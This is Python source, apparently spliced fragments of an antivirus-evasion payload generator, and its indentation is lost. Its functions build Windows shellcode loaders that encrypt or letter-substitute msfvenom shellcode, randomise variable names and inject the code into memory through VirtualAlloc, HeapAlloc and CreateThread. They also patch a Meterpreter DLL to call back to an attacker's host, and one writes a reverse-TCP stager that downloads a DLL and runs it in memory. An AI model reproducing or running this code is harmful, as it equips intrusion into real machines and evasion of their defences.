RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
"\t"
+ HeapVar
+ " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
+ ShellcodeVariableName
+ ") * 2),avlol.c_int(0))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
+ HeapVar
+ "),avlol.c_int(0x00000008),avlol.c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "from ctypes import *\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = "
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape')\n"
)
PayloadCode += (
RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "from ctypes import *\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = "
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape')\n"
)
PayloadCode += (
"\t"
+ RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += "\t" + RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
#Random letter substition variables
hex_letters = "abcdef"
non_hex_letters = "ghijklmnopqrstuvwxyz"
encode_with_this = random.choice(hex_letters)
decode_with_this = random.choice(non_hex_letters)
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
subbed_shellcode_variable_name = helpers.randomString()
shellcode_variable_name = helpers.randomString()
rand_ptr = helpers.randomString()
rand_buf = helpers.randomString()
rand_ht = helpers.randomString()
rand_decoded_letter = helpers.randomString()
rand_correct_letter = helpers.randomString()
rand_sub_scheme = helpers.randomString()
# Create Letter Substitution Scheme
sub_scheme = string.maketrans(encode_with_this, decode_with_this)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Create Payload File
payload_code = 'import ctypes as avlol\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes as avlol\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
HeapVar = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes as avlol\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
payload_code += rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes as avlol\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
#Additional random variable names
rand_reverse_shell = helpers.randomString()
rand_memory_shell = helpers.randomString()
rand_shellcode = helpers.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += rand_shellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
#Additional random variable names
rand_reverse_shell = helpers.randomString()
rand_memory_shell = helpers.randomString()
rand_shellcode = helpers.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += '\t' + rand_shellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
def generate(self):
# randomize all of the variable names used
shellCodeName = helpers.randomString()
socketName = helpers.randomString()
intervalName = helpers.randomString()
attemptsName = helpers.randomString()
getDataMethodName = helpers.randomString()
fdBufName = helpers.randomString()
rcvStringName = helpers.randomString()
rcvCStringName = helpers.randomString()
injectMethodName = helpers.randomString()
tempShellcodeName = helpers.randomString()
shellcodeBufName = helpers.randomString()
fpName = helpers.randomString()
tempCBuffer = helpers.randomString()
payloadCode = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payloadCode += "%s, %s = None, None\n" % (shellCodeName, socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payloadCode += "def %s():\n" % (getDataMethodName)
payloadCode += "\ttry:\n"
payloadCode += "\t\tglobal %s\n" % (socketName)
# build the socket and connect to the handler
payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (
socketName)
payloadCode += "\t\t%s.connect(('%s', %s))\n" % (
socketName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (
fdBufName, socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" % (
socketName)
payloadCode += "\t\t%s = \" \"\n" % (rcvStringName)
# receive ALL of the payload .dll data
payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (
rcvStringName, rcvStringName, socketName)
payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (
rcvCStringName, rcvStringName, rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (
rcvCStringName)
# copy the socket fd in
payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (
rcvCStringName, fdBufName)
payloadCode += "\t\treturn %s\n" % (rcvCStringName)
payloadCode += "\texcept: return None\n"
# build the method that injects the .dll into memory
payloadCode += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
payloadCode += "\tif %s != None:\n" % (tempShellcodeName)
payloadCode += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName,
tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (
fpName, shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (
fpName, shellcodeBufName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (
tempCBuffer, shellcodeBufName, shellcodeBufName)
# copy the .dll into the allocated memory
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (
fpName, tempCBuffer, shellcodeBufName)
# kick the thread off to execute the .dll
payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (
fpName)
# wait for the .dll execution to finish
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# set up expiration options if specified
if self.required_options["expire_payload"][0].lower() == "x":
# download the stager
payloadCode += "%s = %s()\n" % (shellCodeName, getDataMethodName)
# inject what we grabbed
payloadCode += "%s(%s)\n" % (injectMethodName, shellCodeName)
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
randToday = helpers.randomString()
randExpire = helpers.randomString()
payloadCode += 'from datetime import datetime\n'
payloadCode += 'from datetime import date\n\n'
payloadCode += randToday + ' = datetime.now()\n'
payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n'
# download the stager
payloadCode += "\t%s = %s()\n" % (shellCodeName, getDataMethodName)
# inject what we grabbed
payloadCode += "\t%s(%s)\n" % (injectMethodName, shellCodeName)
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn off SSL
meterpreterDll = patch.patchTransport(meterpreterDll, False)
# replace the URL
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
